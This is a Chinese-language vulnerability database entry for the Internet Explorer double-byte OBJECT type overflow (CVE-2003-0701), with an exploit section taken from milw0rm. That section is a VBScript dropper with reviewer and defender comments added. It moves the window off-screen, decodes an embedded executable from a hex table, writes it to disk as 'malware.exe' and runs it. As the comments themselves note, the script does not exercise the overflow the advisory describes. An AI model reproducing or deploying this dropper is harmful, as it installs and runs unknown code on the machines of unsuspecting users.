Internet Explorer缓冲区溢出漏洞

Internet Explorer缓冲区溢出漏洞

漏洞ID 1107456 漏洞类型 缓冲区溢出
发布时间 2003-08-21 更新时间 2003-08-27
CVE编号 CVE-2003-0701
CNNVD-ID CNNVD-200308-125
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/83
https://www.securityfocus.com/bid/82762
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200308-125
|漏洞详情
支持双字节编码的语言(例如:日语)版本的 Internet Explorer 6 SP1 存在缓冲区溢出漏洞。远程攻击者可以借助 Object 标签的 Type 属性执行任意代码。该漏洞是 CVE-2003-0344 的变体。
|漏洞EXP
<!-- Analysis notes (review): this listing is a script stage only. It rebuilds a
     binary from an inline hex table, writes it to disk as "malware.exe" and
     launches it. Nothing in the listing references an OBJECT tag or overflows a
     buffer, so how it relates to the advisory text on this page should be
     checked against the original source. The page cites MS03-032 as the vendor
     bulletin. -->
<title>by malware M03-032 Exploit</title>
<script language=vbs>

' Moves the hosting window to coordinates 5000,5000; presumably this puts it
' off-screen so the user does not see it (review assumption).
self.MoveTo 5000,5000

' v holds the encoded payload in 25 string elements (indices 0..24).
dim v(24)
' cut is an optional "/"-separated list of extra substitution values.
' It is empty in this listing.
cut=""

' Encoded payload table. The elements v(0)..v(24) are concatenated further down
' and split on "," into tokens. As consumed by the decode loop, the first two
' characters of a token are a hex byte value and any remaining characters are a
' hex repeat count for that byte. "y" and "z" are placeholders that the res
' calls expand to "00" and "FF" before decoding.
' The stream starts with 4D,5A ("MZ"), the signature of a DOS/Windows
' executable, so an inline comma-separated hex table beginning this way inside
' page script is a useful content indicator for scanners.
' NOTE(review): runs such as B0,13,CD,10 and B8,y,4C,CD,21 look like 16-bit DOS
' video-mode and program-exit interrupt calls. The payload's behaviour has not
' been verified here; analyse it only in an isolated environment.
v(0)="4D,5A,44,01,05,y,02,y,20,y,21,y,z2,75,y2,02,y2,99,y3,3E,y3,01,y,FB,30,6A,72,y1C,79,y3,9E,
y1CD,66,33,C0,33,z,8C,D3,83,C3,20,B9,70,3F,8E,C3,F3,66,AB,8C,C0,8E,D8,B8,y,A0,8E,C0,C3,66"
v(1)=",B9,y,FA,y2,66,BF,y4,66,BE,81,02,y2,66,33,C0,67,8A,9F,40,01,y2,03,D8,C1,E3,04,2B,D8,2B,
D8,66,C1,C8,10,03,D8,AC,03,D8,C1,EB,05,67,88,1F,47,E2,DE,C3,B9,80,3E,33,z,33,F6,F3,66,A5,C3"
v(2)=",1E,06,8C,D8,05,A0,0F,8E,C0,B8,0F,y,8E,D8,33,C0,67,8A,03,8B,F0,BF,0A,y,B9,2C,01,F3,A4,
8B,F0,83,C7,14,B9,2C,01,F3,A4,07,1F,C3,B0,13,CD,10,BA,0F,y,8E,DA,BE,48,03,BA,C8,03,32,C0,EE"
v(3)=",42,B9,y,03,F3,6E,E8,5C,z,66,33,DB,E8,B5,z,53,E8,6E,z,BA,DA,03,EC,A8,08,75,FB,EC,A8,08,
74,FB,E8,96,z,5B,FE,C3,B4,01,CD,16,74,E0,B8,03,y,CD,10,B8,y,4C,CD,21,yF,B1,C0,90,1D,7B"
v(4)=",88,D9,26,6B,C2,C1,88,B8,C9,A4,3A,8B,7F,93,8E,5C,30,DB,1F,3A,7F,8D,57,33,C1,8C,B1,77,
98,89,DA,6B,D7,5C,86,7C,AB,A8,8E,22,D0,D9,A0,5E,85,D9,2E,A2,C3,6C,63,6C,45,24,BF,21,97,8E,D0,8A"
v(5)=",1A,BF,C0,9B,16,26,B2,9D,D7,8A,2D,B3,8C,24,49,A5,8D,29,9F,2D,87,5C,C6,C7,5A,38,97,96,
2D,2A,15,CD,A5,73,CC,AE,A6,5D,75,A4,22,B3,9F,8C,D7,77,26,A7,56,B0,B8,64,84,1B,5A,D9,1D,CE,AF,36"
v(6)=",3B,98,7C,C3,38,4C,C0,1A,22,1E,CF,46,79,622,1D,78,D7,CF,6D,DA,7F,6C,A2,25,97,C8,4B,C2,
C8,33,70,A5,29,1C,19,BB,A9,69,18,A3,34,9F,51,63,33,1B,3A,7D,57,81,BD,20,A9,D5,23,19,55,4C,55,AA"
v(7)=",62,19,A1,89,23,2B,6B,30,72,92,39,52,94,A8,35,6E,57,CA,CC,C8,CB,9B,C1,71,46,6B,61,6B,2A,
7E,71,C7,49,AD,3A,4F,AB,C1,5F,15,67,A7,C4,3C,87,90,59,8A,D7,64,C8,21,BE,1B,6C,90,B0,D8,73,91"
v(8)=",50,75,41,3C,4C,56,D6,3F,A2,2C,1C,B9,65,D8,76,C6,38,B5,51,B9,33,B4,48,64,84,56,A8,A0,AE,
1D,9C,C2,1B,83,93,DB,59,54,22,75,70,AF,9E,19,7E,78,34,7D,5D,AA,A1,5E,55,46,BB,BE,14,C5,1A,45"
v(9)=",5E,14,3B,C5,7B,6D,BB,40,81,AD,7A,D2,4A,8E,3D,B4,D6,5C,A9,C6,26,C7,98,58,C6,7D,BB,15,BE,
78,CF,C5,74,7C,75,AA,2B,77,25,C1,5F,A7,23,C1,8A,CF,D7,49,55,54,9B,84,8A,55,5D,35,1F,71,25,92"
v(10)=",79,D5,CF,82,2E,23,5D,8B,35,8A,4E,76,1C,C6,7E,26,19,AF,A7,32,38,CE,49,2C2,D0,14,67,39,
2D,29,83,33,82,CE,AD,CF,CD,28,1A,1E,38,B0,CE,41,2E,7B,48,4C,2B,D2,92,BD,CB,97,24,B8,39,C2,9C,5A"
v(11)=",D9,D3,63,17,D7,71,18,302,96,67,1C,9E,50,45,58,30,8B,C4,7F,85,9A,4C,C9,58,B3,1F,D3,53,
20,24,C9,D6,D0,A8,5A,A1,48,92,7B,D3,70,B2,72,2A,CF,B5,8F,C1,63,2D,1F,6E,1C,B6,B2,C0,2E,B6,26,19"
v(12)=",B5,20,B9,5C,14,3D,C9,2A,51,20,7A,3B,B3,2B,CE,B8,3F,90,A8,2F,CF,4E,CF,68,28,1B,14,BF,6F,
A2,1C,85,88,D0,AA,5E,18,B7,1A,1E,C6,7F,D9,94,6D,AC,B5,4C,59,B0,6E,C0,4D,3D,A4,C0,5A,90,65,38"
v(13)=",53,38,61,81,CA,A4,3C,96,28,49,78,86,54,2F,63,2E,42,66,57,28,2B,95,BF,58,5E,51,95,5E,A2,
3D,71,C9,A8,CD,AE,C1,54,D4,BC,2A,9C,76,9E,43,9E,84,92,AB,A4,3B,1B,BF,B9,75,65,5E,B3,3C,8C,94"
v(14)=",41,B5,93,B8,59,DB,C2,87,D5,76,60,61,3B,47,A9,15,7E,96,A2,38,60,62,80,9B,2A,5E,CB,A7,6F,
47,83,36,82,8F,72,18,37,8F,20,4E,D8,9E,B1,9B,85,3E,A3,70,5F,8A,54,5B,2D,C6,A8,A7,68,8D,94,1E"
v(15)=",44,A4,16,83,BC,99,58,3E,C5,9E,15,4F,9C,78,3A,6A,7F,2A,32,9F,48,30,47,59,6D,3D,AA,48,7D,
AE,AF,DB,72,A8,D9,D1,2A,98,B5,49,BC,36,6B,17,45,D2,3E,DB,37,B1,67,80,A0,99,9D,93,89,93,90,88"
v(16)=",90,47,58,65,5A,C4,C8,80,2E,80,A0,8F,77,9A,5E,4F,D3,B3,92,3A,81,1B,4D,CD,2B,D8,A1,5B,9F,
63,3E,D6,A7,17,55,7C,73,C9,90,C5,33,85,82,B2,39,78,64,C1,3C,C2,77,80,4D,21,37,96,29,69,4A,C6"
v(17)=",4A,53,C2,65,94,68,54,8C,A7,68,74,40,79,C7,512,63,8E,8D2,92,5B,37,30,722,47,A2,8E,B1,84,
51,1D,A2,4B,26,53,58,7C,5C,B1,3A,97,AC,56,B7,C4,42,BC,3F,65,82,yF0,0F,y2,10,y2,11,y2,12,y2,13,y2"
v(18)=",14,y2,15,y2,16,y2,17,y2,18,y2,19,y2,1A,y2,1B,y2,1C,y2,1D,y2,1E,y2,1F,y2,20,y2,21,y2,22,y2,
23,y2,24,y2,25,y2,26,y2,27,y2,28,y2,29,y2,2A,y2,2B,y2,2C,y2,2D,y2,2E,y2,2F,y2,30,y2,31,y2"
v(19)=",32,y2,33,y2,34,y2,35,y2,36,y2,37,y2,38,y2,39,y2,3A,y2,3B,y2,3C,y2,3D,y2,3E,y2,3F,y2,3F,y2,
3F,y2,3F,01,y,3F,02,y,3F,03,y,3F,04,y,3F,05,y,3F,06,y,3F,07,y,3F,08,y,3F,09,y,3F"
v(20)=",0A,y,3F,0B,y,3F,0C,y,3F,0D,y,3F,0E,y,3F,0F,y,3F,10,y,3F,11,y,3F,12,y,3F,13,y,3F,14,y,3F,15,y,3F,
16,y,3F,17,y,3F,18,y,3F,19,y,3F,1A,y,3F,1B,y,3F,1C,y,3F,1D,y,3F"
v(21)=",1E,y,3F,1F,y,3F,20,y,3F,21,y,3F,22,y,3F,23,y,3F,24,y,3F,25,y,3F,26,y,3F,27,y,3F,28,y,3F,29,y,
3F,2A,y,3F,2B,y,3F,2C,y,3F,2D,y,3F,2E,y,3F,2F,y,3F,30,y,3F,31,y,3F"
v(22)=",32,y,3F,33,y,3F,34,y,3F,35,y,3F,36,y,3F,37,y,3F,38,y,3F,39,y,3F,3A,y,3F,3B,y,3F,3C,y,3F,3D,y,
3F,3E,y,3F2,y,3F2,y,3F2,y,3F2,01,3F2,02,3F2,03,3F2,04,3F2,05,3F2,06,3F2,07,3F2,08"
v(23)=",3F2,09,3F2,0A,3F2,0B,3F2,0C,3F2,0D,3F2,0E,3F2,0F,3F2,10,3F2,11,3F2,12,3F2,13,3F2,14,3F2,
15,3F2,16,3F2,17,3F2,18,3F2,19,3F2,1A,3F2,1B,3F2,1C,3F2,1D,3F2,1E,3F2,1F,3F2,20,3F2,21,3F2,22,
3F2,23,3F2,24,3F2,25,3F2,26"
v(24)=",3F2,27,3F2,28,3F2,29,3F2,2A,3F2,2B,3F2,2C,3F2,2D,3F2,2E,3F2,2F,3F2,30,3F2,31,3F2,32,3F2,
33,3F2,34,3F2,35,3F2,36,3F2,37,3F2,38,3F2,39,3F2,3A,3F2,3B,3F2,3C,3F2,3D,3F2,3E,3F5,3F"

' res: substitute every occurrence of substring x with y in each element of
' the script-level array v, modifying v in place.
'   x - substring to search for (a placeholder letter in the encoded table)
'   y - replacement text
' Declared as a Function but assigns no return value; callers invoke it as a
' statement.
function res(x,y)
' Visit every element of v, from index 0 to its upper bound.
For k = 0 To UBound(v)
v(k) = Replace(v(k), x, y)
Next
End Function

' Stage 1: expand the fixed placeholders in the table. "z" becomes "FF" and
' "y" becomes "00".
res "z", "FF"
res "y", "00"
' Stage 2: optional extra placeholders. Each "/"-separated entry of cut is
' mapped to a successive character starting at code 103 ("g", the first letter
' after the hex digits a-f). Because cut is the empty string in this listing,
' the loop is not expected to perform any substitution here.
piece = Split(cut, "/")
cc = 103

For n = 0 To UBound(piece) - 1
res Chr(cc), piece(n)
cc = cc + 1
Next

' Stage 3: join all table elements into one comma-separated token string.
' "it" is not initialised beforehand, so it starts out empty.
For m = 0 To UBound(v)
it = it & v(m)
Next


' Stage 4: decode the tokens and write the resulting bytes to disk.
tmp = Split(it, ",")
' Defender note: a page-hosted script that instantiates
' Scripting.FileSystemObject and, further down, WScript.Shell is a strong
' behavioural indicator. NOTE(review): this presumably only succeeds when the
' script runs outside normal Internet-zone scripting restrictions; confirm
' against the MS03-032 bulletin referenced on this page.
Set fso = CreateObject("Scripting.FileSystemObject")
' Relative file name, so the file is created in the host process's current
' directory. The name "malware.exe" is a simple host-side indicator.
pth = "malware.exe"
Set f = fso.CreateTextFile(pth, ForWriting)
For i = 0 To UBound(tmp)
l = Len(tmp(i))
' First two characters of the token: the byte value, parsed as hex.
b = Int("&H" & Left(tmp(i), 2))
If l > 2 Then
' Remaining characters: hex repeat count, so byte b is written r times.
r = Int("&H" & Mid(tmp(i), 3, l))
For j = 1 To r
f.Write Chr(b)
Next
Else
' Two-character token: a single literal byte.
f.Write Chr(b)
End If
Next
f.Close
' Stage 5: launch the file that was just written. The browser or script host
' spawning a freshly written executable is the process-creation event to
' alert on.
Set shell=CreateObject("WScript.Shell")
shell.run(pth)

</script>

// milw0rm.com [2003-08-21]
|受影响的产品
Microsoft Internet Explorer for Unix 6.0 Windows Server 2

Microsoft Internet Explorer 5.0.1

Microsoft Windows 2000 Advanced Server SP2

Microsoft

|参考资料

来源:US-CERT Vulnerability Note: VU#334928
名称:VU#334928
链接:http://www.kb.cert.org/vuls/id/334928
来源:MS
名称:MS03-032
链接:http://www.microsoft.com/technet/security/bulletin/ms03-032.asp
来源:BUGTRAQ
名称:20030820 [SNS Advisory No.68] Internet Explorer Object Type Buffer Overflow in Double-Byte Character Set Environment
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106148101210479&w=2
来源:XF
名称:ie-dbcs-object-bo(12970)
链接:http://xforce.iss.net/xforce/xfdb/12970
